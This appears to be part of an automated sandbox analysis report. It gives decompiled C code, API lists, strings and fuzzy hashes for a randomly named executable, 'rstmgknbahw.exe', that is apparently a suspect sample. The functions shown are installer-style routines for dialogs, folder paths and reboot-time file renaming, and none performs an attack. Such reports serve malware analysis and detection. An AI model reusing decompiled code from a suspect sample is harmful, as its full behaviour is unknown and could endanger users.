						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x759a19
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x7583dc
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x753e70
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32 ref: 0040403C
GetSysColor.USER32(?), ref: 0040404D
SendMessageA.USER32 ref: 0040405C
SendMessageA.USER32 ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32 ref: 00404083
SendMessageA.USER32 ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32 ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32 ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32 ref: 004041CA
SendMessageA.USER32 ref: 004041DE

Strings

N, xrefs: 00404111
@.B, xrefs: 00404183
open, xrefs: 00404186
p>u, xrefs: 0040403E

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open$p>u
API String ID: 3615053054-3984196603
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x753e70
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "heifsmlbdxlebvytfzg Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

heifsmlbdxlebvytfzg Setup, xrefs: 00401150
F, xrefs: 0040100C
p>u, xrefs: 00401039

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$heifsmlbdxlebvytfzg Setup$p>u
API String ID: 941294808-223641062
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t18 =  *0x423eb0; // 0x753e70
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

%s=%s, xrefs: 0040585A
[Rename], xrefs: 004058D4, 004058E6
(&B, xrefs: 0040580E
p>u, xrefs: 0040586C

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]$p>u
API String ID: 3772915668-890395977
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00404275 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x759a19
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t124 =  *0x423eb0; // 0x753e70
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(xzfdi,00420498,00000000,?,?), ref: 004043E0
lstrcatA.KERNEL32(?,xzfdi), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

xzfdi, xrefs: 004043DA, 004043DF, 004043EA
C:\Users\user\AppData\Local\Temp, xrefs: 004043C9
p>u, xrefs: 004043BA
A, xrefs: 0040439C

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$p>u$xzfdi
API String ID: 2246997448-2661627686
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42367c; // 0x759a19
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x423ed8; // 0x7583dc
				_t73 = _t72 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4; // 0x73951340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

APIs

GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,xzfdi), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
